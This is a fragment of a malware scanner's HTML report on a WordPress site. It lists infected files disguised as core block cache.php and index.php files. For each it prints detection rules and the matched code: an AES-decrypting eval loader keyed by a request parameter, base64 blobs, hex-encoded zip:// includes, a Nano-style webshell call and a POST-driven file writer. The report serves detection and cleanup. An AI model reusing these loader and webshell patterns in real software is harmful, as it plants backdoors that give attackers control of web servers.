</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_9").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/blocks/paragraph/paragraph/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:01</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:01</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_10" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'UaOpVjA/TBRWgvdgbtkNmVIrky4lU9eG42/w5fPZ1Hv6yDuwwPf6/5F6Tbfo1bH+wY4+lDOU/vn91a+DJeiiXr99t95ptLm3eg5jud7m37Z3phVuyDX82VvdnYv+6VPoYROdwda/OBfq57TN+U+UCZrtSfafObdxen/47rzO6T+7GjoWBR2DTBrl8dNzljJtwv2z9/oUNr6zDW5MER6E1rF1yGZ72Hgw+oAvRiFRUUWwujHWu78fU1ZapNdneaI8HIz5XZCdQcy07OHBYCKOBKwxEpgglzEJFjCtjb3yI8CsryiDPQ2+Fh1gU21yBUGoEVBoPexc7g2e3C6I5q3h49BoRT08ttnfi1Jed4Ka1aVsuyMAlg171NDb5Kz+mM4zVu/Hn35236NrX+92KZGXTgEjilgq7qx3ic960KaHYf1OZSxePU9bzU983U1v9fv24M0Ph+KJ1KUAdYBNyOUNU0JboFfUQ9zIeMvX1D4mfxXTQwaSDOr...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rXu</span><span style="color: #007700">(</span><span style="color: #0000BB">$PJX</span><span style="color: #007700">) { </span><span style="color: #0000BB">$CqQuH </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$qYb </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$CqQuH</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$gsmvi </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$PJX</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$gsmvi</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$CqQuH</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$qYb</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">rXu</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'877iQ3/kfYl+llD2AenOAD4ZVD2zcA5yRK</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$rXu</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$rXu</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_10").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/blocks/paragraph/paragraph/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 72.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:01</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:01</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_11" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"d0ZpSlFWUE5lbWtFaHFZdXR2QloudGlm"</span><span style="color: #007700">); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_11").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/blocks/post-author-biography/post-author-biography/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 366.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_12" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$u</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit silence_inclusion <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>LFI (Local File Inclusion), through a silent inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">@require </span><span style="color: #DD0000">"\x7a\x69\x70\x3a\x2f\x2f\x77\x6d\x61\x5f\x36\x39\x37\x38\x37\x33\x66\x63\x30\x37\x39\x36\x31\x2e\x7a\x69\x70\x23\x63\x5f\x36\x39\x37\x38\x37\x33\x66\x63\x30\x37\x39\x36\x31\x2e\x74\x6d\x70"</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 5aabe84e <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 5aabe84e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">require </span><span style="color: #DD0000">"zip:</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_12").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/blocks/post-author-biography/post-author-biography/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 408.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:52</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_13" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$u</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$u</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">](</span><span style="color: #0000BB">$u</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_13").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/blocks/spacer/spacer/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:48</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:48</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_14" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'gpOFQmA/TBRGgvd4b9kNlVIrky4lU9eGo38/xHOW73v98jnZwDfH8xZGA3fc85TPOK+f6gTP8xKPJXvpWThPo1+B0pK15VZBe/oTXt+o/fblDvfjGn4lLe7ubeVtLf8pD0dI794Nx+qjXF88p2fMTKJs92oM1/6tu4v3Xs90F39NndjSArhNHuSC318XNjky8dzn+j+1skPvatDQFsHUOT0rZlxLdN2LgA8m4fQhRRVbOQmov+vuUvV9580l2TOPQuDnxMqIF8tg8DuwRMmJq/gAYsRJAJ5IZr4QcSc6WGhXgtVYa0eKz/UsC0xuSOhyA1oLG9uLubH1y7WTHZX82nw2Ddaim/t44LvuJM9tqWtWRKnNbwNY52CC3td5Z/Ti95z2vTz+cnHe9yZevNyn9FEK1oYLoaua+9UUretg+x2VhTmXinSg09tXH/NV9r50vzOA9DooaatBJAHW8TsAVzFc2WRwP1C+MiHxz19DiZX8xUKvuk4...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">iCr</span><span style="color: #007700">(</span><span style="color: #0000BB">$UbTcq</span><span style="color: #007700">) { </span><span style="color: #0000BB">$zYxAh </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$MvZX </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$zYxAh</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$QjGrg </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$UbTcq</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$QjGrg</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$zYxAh</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$MvZX</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">iCr</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'pQx6rhbmhn5xIQVvj9Q3LJ9SirlX</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$iCr</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$iCr</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_14").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/blocks/spacer/spacer/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 48.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:04:48</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:04:48</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_15" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"VHguZjR2"</span><span style="color: #007700">); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_15").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/blocks/block/block/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:15</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:15</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_16" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'QR6IEvf4PKI2A8tHcrlohsCZ1UGvkq2zQ3hnO96p695hXe/hb0x7+v9qe25vLc6Dvzbf0JHct8vU7vugjo4tafPaV+b5m5tkM/4t3e+2j3/Bnc1Gl4lLe7uzebtLf8pDUsQ784Nh/2jXl98p2fMTKhs92oM1/6tu4v3Xs90F3jNndjSArhMjRph5S+rmZyx8u5T/Z/aU6nXt+BoA2jKVB61u6YlsL7FgIeTkHIwqoKNHI20X73Yq/qpseaS7JnnK/BzYOVoc3EjMNuwRAmhqzgAYkRJ8JZNRCxrY540tMCvArqvww9lh/RYF4hdl8DkGKRXM6jXA3Orh3thKyu4tfetD60FNvb61HYtjHHtqWtWBLrNDwOY9Bcx42u6s/JB+y173h5ftFNf70r9SLkOjLIVqBxXUld147RpW9aB9jtqGnNuI/Huq9avKubr+3wobrdG+XQa1kaCSAOkcnYAqWKoo90gbqp8ZUPin77HAju4j5IedZBn...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rmBpI</span><span style="color: #007700">(</span><span style="color: #0000BB">$yRUVb</span><span style="color: #007700">) { </span><span style="color: #0000BB">$ZMH </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$UEkvt </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZMH</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$SRCY </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$yRUVb</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$SRCY</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$ZMH</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$UEkvt</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">rmBpI</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'Z43ako+O0PrlW8ByDxrZ1TWTI7IxQD</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$rmBpI</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$rmBpI</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_16").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/blocks/block/block/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 53.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:15</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:15</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_17" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"QXpzdHFmVWxqLmZsdg"</span><span style="color: #007700">); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_17").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/L4P2yIvUrma.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:32:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:32:17</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 44</span><br><table id="file_18" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)</span>
</span>
